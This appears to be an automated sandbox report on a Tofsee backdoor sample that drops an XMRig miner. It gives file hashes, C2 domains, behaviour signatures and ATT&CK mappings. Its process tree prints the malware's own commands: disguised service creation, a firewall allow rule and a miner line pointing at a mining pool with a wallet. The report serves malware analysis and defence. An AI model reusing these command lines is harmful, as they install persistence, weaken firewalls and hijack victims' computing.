Analysis

  • max time kernel
    152s
  • max time network
    151s
  • platform
    windows10_x64
  • resource
    win10-en-20211104
  • submitted
    27-11-2021 08:56

General

  • Target

    0428125808208688f048820edba8be134d27861b5af8e8af6a178a88846cdde2.exe

  • Size

    315KB

  • MD5

    ac7988f4e59d807f41a4a2163538fd46

  • SHA1

    ab29b1ea7a76e8c9dfb61a8827e3c617416df95f

  • SHA256

    0428125808208688f048820edba8be134d27861b5af8e8af6a178a88846cdde2

  • SHA512

    cd9441be653eac1eb54647abbca76162abdf2618b44ded7b710e9a5fb5af5a1f4bb221f1e85e4ede43c66ea60e0a82d2ce627414b93f731478f9c5fff2cf5130

Malware Config

Extracted

  • Family
    tofsee
  • C2
    quadoil.ru
    lakeflex.ru

Signatures

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Windows security bypass 2 TTPs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner Payload 3 IoCs
  • Creates new service(s) 1 TTPs
  • Executes dropped EXE 1 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Sets service image path in registry 2 TTPs
  • Deletes itself 1 IoCs
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utility to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies data under HKEY_USERS 16 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\0428125808208688f048820edba8be134d27861b5af8e8af6a178a88846cdde2.exe
    "C:\Users\Admin\AppData\Local\Temp\0428125808208688f048820edba8be134d27861b5af8e8af6a178a88846cdde2.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2668
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ktxptifj\
      2⤵
      PID:3428
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\cvgwhexq.exe" C:\Windows\SysWOW64\ktxptifj\
      2⤵
      PID:424
    • C:\Windows\SysWOW64\sc.exe
      "C:\Windows\System32\sc.exe" create ktxptifj binPath= "C:\Windows\SysWOW64\ktxptifj\cvgwhexq.exe /d\"C:\Users\Admin\AppData\Local\Temp\0428125808208688f048820edba8be134d27861b5af8e8af6a178a88846cdde2.exe\"" type= own start= auto DisplayName= "wifi support"
      2⤵
      PID:848
    • C:\Windows\SysWOW64\sc.exe
      "C:\Windows\System32\sc.exe" description ktxptifj "wifi internet conection"
      2⤵
      PID:4020
    • C:\Windows\SysWOW64\sc.exe
      "C:\Windows\System32\sc.exe" start ktxptifj
      2⤵
      PID:804
    • C:\Windows\SysWOW64\netsh.exe
      "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
      2⤵
      PID:984

  • C:\Windows\SysWOW64\ktxptifj\cvgwhexq.exe
    C:\Windows\SysWOW64\ktxptifj\cvgwhexq.exe /d"C:\Users\Admin\AppData\Local\Temp\0428125808208688f048820edba8be134d27861b5af8e8af6a178a88846cdde2.exe"
    1⤵
    • Executes dropped EXE
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:4040
    • C:\Windows\SysWOW64\svchost.exe
      svchost.exe
      2⤵
      • Deletes itself
      • Drops file in System32 directory
      • Suspicious use of SetThreadContext
      • Modifies data under HKEY_USERS
      • Suspicious use of WriteProcessMemory
      PID:1288
      • C:\Windows\SysWOW64\svchost.exe
        svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:4000

MITRE ATT&CK Matrix ATT&CK v6

  • Persistence
    • T1050 New Service: 1
    • T1031 Modify Existing Service: 1
    • T1060 Registry Run Keys / Startup Folder: 1
  • Privilege Escalation
    • T1050 New Service: 1
  • Defense Evasion
    • T1089 Disabling Security Tools: 1
    • T1112 Modify Registry: 2
  • Discovery
    • T1082 System Information Discovery: 1


Downloads

  • C:\Users\Admin\AppData\Local\Temp\cvgwhexq.exe
    MD5
    e69af9d3ee1c8e2c8f9be3b4eb2d708a
    SHA1
    f5358dc7bad45d2b5b20ed07a1fc5784dc31b434
    SHA256
    9fc6db594ad85065e7d64617eec74f24c3a71d9d4e2dfe286af9802b1542d736
    SHA512
    521e638a53303ac6543d13eafd6867a235eca15623cc77819c80e0daa3bed09a7ca34236d9361891ce88180f2d65be42e4825442d185c00ddcae3094c3bc6a74

  • C:\Windows\SysWOW64\ktxptifj\cvgwhexq.exe
    MD5
    e69af9d3ee1c8e2c8f9be3b4eb2d708a
    SHA1
    f5358dc7bad45d2b5b20ed07a1fc5784dc31b434
    SHA256
    9fc6db594ad85065e7d64617eec74f24c3a71d9d4e2dfe286af9802b1542d736
    SHA512
    521e638a53303ac6543d13eafd6867a235eca15623cc77819c80e0daa3bed09a7ca34236d9361891ce88180f2d65be42e4825442d185c00ddcae3094c3bc6a74
